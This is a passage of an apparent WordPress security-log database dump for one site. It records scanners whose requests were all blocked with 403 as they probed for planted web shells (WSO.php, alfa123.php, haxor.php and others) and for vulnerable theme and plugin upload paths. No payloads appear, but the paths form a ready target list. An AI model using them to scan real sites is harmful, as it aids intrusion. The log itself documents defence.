3.5.30729)\"}','VLX27cSThOdry4QsuAwz39WF',0,1674932296.1898,187,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RXIejmTkJyzBMxin70VFwH6h',0,1674932296.8107,192,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4CJosZGp09m27K1DFdnOPh6A',0,1674932297.4320,162,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','w2LuSVTXfWHNOnpozcsrID45',0,1674932298.0052,233,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hBdeRumbqopcafxTG4KPnEIg',0,1674932298.7015,169,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rPYVIiyBeOuEnDmHlCGz1wjf',0,1674932299.3049,171,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0YOHcSkzKsAMxhatBPnrwRFj',0,1674932299.8936,170,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','h9iRCok60JEOsTKU3wngjH1G',0,1674932300.4741,198,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tV5EavGz9eQuqHBUlNsfdLib',0,1674932301.0839,174,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rANaQEO3m5CdxHFp84nBb2MU',0,1674932301.6722,212,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ignQMRp6HTCqGa9YscKrvyIe',0,1674932302.3518,162,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zKHyeUZ4Qa97xIrlwSRgf2NW',0,1674932302.9391,183,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','l1nzfPoxk47Vi0N3hjHIy8gr',0,1674932303.5600,210,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gLHmGkB8lrb1vaOiStFhf0CU',0,1674932304.2228,167,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1vsAKFd7MGuzVhg6wYo4TWeU',0,1674932304.8128,169,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Rj8DyeGC0BHJc5swEu3FVtlx',0,1674932305.4105,159,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zyPFQkYB1guaTWMb0cnRx8Ur',0,1674932305.9792,170,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XdOixEWP4U6coQpvCRTzeNur',0,1674932306.5595,183,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','t9TAmwNJQiDr64KRksc5zhuF',0,1674932307.1495,194,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dUcoEPHe6FyJRzq70kDTOLvr',0,1674932307.7859,182,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Y7BDLtCiaWXkAbxFVUGnjESN',0,1674932308.3911,169,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IF6L9wGp5gX7slaDecuJmqhz',0,1674932308.9845,195,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BvzTS8eR1YGojn0qrWbX4cZI',0,1674932309.6051,191,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HUG9BIVcxTMAkghtqPemlaO8',0,1674932310.2203,169,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3PxTmepvKybj5kUYqwri12VM',0,1674932310.7941,188,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OZGxBIEPejSs73H0MR2kudvr',0,1674932311.4221,164,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rnqVWdYp3gJPhcFvtCb74X2O',0,1674932312.0042,187,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eGkOFnrV4uxUTPbioKMQw3Eg',0,1674932312.6233,166,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kSfWwebq4l5ZCuKdLJGT2mPH',0,1674932313.2085,177,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SNkmiP8hRWDTI2B1Yvsn645b',0,1674932313.7901,175,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xyJbrp7fVc9DWUeXZwiqkYO2',0,1674932314.3631,181,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qwAHyuDkPf5jcxlZUaShYmgp',0,1674932314.9686,210,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','j0txuiF8DINQpSVe4CTyYs1v',0,1674932315.6017,176,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KjT0u7HzNhpV9td3PvMgnyCL',0,1674932316.1780,203,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','t3RQdXDbx2lAMYNkPLezh51q',0,1674932316.8051,184,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Vy69D3teJpOjTXgmq4aF5RA1',0,1674932317.4082,188,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nidHseYWB260zPlGoQc4yMIp',0,1674932318.0066,171,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','7TVNbQtAIziXMRjEoxm5nLDG',0,1674981319.3546,296,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/spikes/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','gridh3tLoa92nN8HJWlK7cSA',0,1674981334.2924,198,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/onelife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','S9zilOKodrZbe7JRMpW6uAHG',0,1674981339.9731,198,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/aidreform/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','YPzer3EOwgRFGi9hdx7Xs5p2',0,1674981377.6394,185,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/spikes-black/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','57VYnCZxHydWlJ4vLpaMqeP9',0,1674981398.1416,167,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/westand/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Rf8tJIu0eHgU72DbYhOly5d4',0,1674981403.2559,231,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/faith-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','zMpnhsQENiDTaleH5GSjbZRK',0,1674981428.8419,185,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/footysquare/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','tygW1VJYsNkbPqT8I9Mi0HZA',0,1674981471.7306,193,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/rocky-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','THEUaBPK6CXxMjNhF27s0fgn',0,1674981487.1710,214,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/statfort/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','RqIzaH0Qye3pbSxulF1sZtrW',0,1674981503.5828,199,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/statfort-new/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','2oftzX9BAVnhy5MPrENOZ8sG',0,1674981508.8196,216,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/bolster/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','65W9Jegbsh2x4caXjwy8GDlm',0,1674981513.8266,221,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/kingclub-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','2qh5VEyPLCYjuU4WaIR0TZrz',0,1674981519.1769,188,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/soundblast/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','wWfl2MtajVDYHhbPT3ILkFeJ',0,1674981556.8049,198,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/churchlife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','pKLo187VJRuwbSvyaEilO4rF',0,1674981579.0949,202,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/theme-deejay/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','fLPc3bpOVszkBFIHJC1rXgMS',0,1674981589.6954,199,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/soccer-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Q2aGLRVNTEtrgBOn1I8SA3bU',0,1674981627.9279,220,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/bolster-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','gGJXzMOTajcVypdvKmNiEFIR',0,1674981639.2389,240,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/club-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','o9yYLurwX1ESRUOj45x3vA0f',0,1674981644.4717,223,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.dailyjolly.co.uk/wp-content/themes/snapture/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','QoBS8cTXAjYCfI6atlwRPyv2',0,1674981654.7018,184,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','dIVf7btxO29XwzyWgAHl6j8K',0,1674982854.3924,196,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/spikes/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','arK1Qd9IWCBfsj0ctVu3EALZ',0,1674982870.6774,206,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/onelife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','a8PYQ4dL5NWx3KlpO7Xn2iZv',0,1674982875.8471,350,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/aidreform/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Wn59wVvqd7bGF4eIP2lMz8Uh',0,1674982915.8572,218,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/spikes-black/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','O4yGDhkE0dbFXvcfn2M73Z89',0,1674982938.0236,206,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/westand/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','wmzTYIxHK6fdOykqAVeuPc7p',0,1674982943.3556,295,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/faith-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Y4QEvwlFmBG6MyqRK2UXzA0p',0,1674982972.3536,224,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/footysquare/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','B1n2qvwPVsTuaylIJN0x6F9K',0,1674983018.8855,202,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/rocky-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Jc7eUmLPVSn6w4pz5aMhyT8k',0,1674983036.0113,215,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/statfort/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Fxn872SwqB91hdkOuHVrm3fj',0,1674983052.2183,201,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/statfort-new/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','YSoCpTwXR0Fe1JInWlGiKrv9',0,1674983057.1189,204,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/bolster/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','6ptCFhB07uXUWcYSOQ3dmPs9',0,1674983062.5220,327,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/kingclub-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','N6fp14rhmZqGoRdQAsHxgWOB',0,1674983068.0899,207,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://dailyjolly.co.uk/wp-content/themes/soundblast/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 